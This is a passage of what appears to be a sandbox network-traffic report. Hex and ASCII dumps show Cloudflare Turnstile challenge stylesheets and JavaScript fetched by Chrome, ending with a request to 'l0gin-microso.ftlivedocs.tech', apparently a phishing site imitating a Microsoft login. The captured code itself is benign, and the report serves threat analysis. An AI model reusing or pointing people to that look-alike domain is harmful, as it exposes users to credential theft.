                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 25 3b 6d 61 72 67 69 6e 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62
                                                                                                                              Data Ascii: %;margin:0;overflow:hidden;padding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-web
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 67 68 74 3a 33 30 70 78 3b 77 69 64 74 68 3a 33 30 70 78 7d 23 73 75 63 63 65 73 73 2d 70 72 65 2d 69 20 6c 69 6e 65 7b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74
                                                                                                                              Data Ascii: ght:30px;width:30px}#success-pre-i line{stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;st
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e
                                                                                                                              Data Ascii: allenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challen
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70
                                                                                                                              Data Ascii: dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-helper-loop
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 7d 23 6c 6f 67 6f 7b 68 65 69 67 68 74 3a 32 35 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 70 78 7d 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65
                                                                                                                              Data Ascii: ,#challenge-overlay a:link,#challenge-overlay a:visited{color:#232323}#challenge-overlay a:active,#challenge-overlay a:focus,#challenge-overlay a:hover{color:#166379}#logo{height:25px;margin-bottom:1px}.failure-circle{stroke-dasharray:166;stroke-dashoffse
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 6e 3a 61 6c 6c 20 2e 31 73 20 65 61 73 65 2d 69 6e 3b 77 69 64 74 68 3a 32 34 70 78 3b 7a 2d 69 6e 64 65 78 3a 39 39 39 38 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 3a 61 66 74 65 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 63 62 2d 6c 62 20 2e 63 62 2d 6c 62 2d 74 7b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 32 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 63 6f 6e 74 65 6e 74 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c
                                                                                                                              Data Ascii: n:all .1s ease-in;width:24px;z-index:9998}.cb-lb .cb-i:after{border-radius:5px;content:"";position:absolute}.cb-lb .cb-lb-t{grid-column:2;margin-left:8px}.size-compact{font-size:14px}.size-compact #content{align-items:flex-start;display:flex;flex-flow:col
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 72 74 6c 7d 2e 72 74 6c 20 2e 63 62 2d 6c 62 2d 74 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 72 74 6c 20 23 65 78 70 69 72 65 64 2d 69 2c 2e 72 74 6c 20 23 66 61 69 6c 2d 69 2c 2e 72 74 6c 20 23 6f 76 65 72 72 75 6e 2d 69 2c 2e 72 74 6c 20 23 73 70 69 6e 6e 65 72 2d 69 2c 2e 72 74 6c 20 23 73 75 63 63 65 73 73 2d 69 2c 2e 72 74 6c 20 23 74 69 6d 65 6f 75 74 2d 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78
                                                                                                                              Data Ascii: rtl}.rtl .cb-lb-t{margin-left:0;margin-right:8px;padding:0}.rtl #expired-i,.rtl #fail-i,.rtl #overrun-i,.rtl #spinner-i,.rtl #success-i,.rtl #timeout-i{left:255px}.rtl #fr-helper{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 61 63 74 69 76 65 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 66 6f 63 75 73 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c
                                                                                                                              Data Ascii: challenge-error-title a{color:#232323}#challenge-error-title a:active,#challenge-error-title a:focus,#challenge-error-title a:hover{color:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#chall


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.1749788104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:02 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:02 UTC441INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:02 GMT
                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                              Content-Length: 47262
                                                                                                                              Connection: close
                                                                                                                              accept-ranges: bytes
                                                                                                                              last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                              access-control-allow-origin: *
                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a62fe318c63-EWR
                                                                                                                              2024-10-04 13:11:02 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                                                                              Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                                                                              Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                                                                              Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                                                                              Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29
                                                                                                                              Data Ascii: al",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(function(e){e.EXECUTE="execute"})
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e
                                                                                                                              Data Ascii: archParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.set("clearance_level",e.params.
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 66 21 3d 3d 76 6f 69 64 20 30 3f 66 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29
                                                                                                                              Data Ascii: ===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==null&&f!==void 0?f:"nonexistent")
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74
                                                                                                                              Data Ascii: uct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function(a){return a.__proto__||Object
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                              Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                                              2024-10-04 13:11:02 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                                              Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.1749790104.26.13.694432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:03 UTC485OUTGET /cdn-cgi/challenge-platform/h/g/jsd/r/8cd56a496a3b5e6a HTTP/1.1
                                                                                                                              Host: l0gin-microso.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
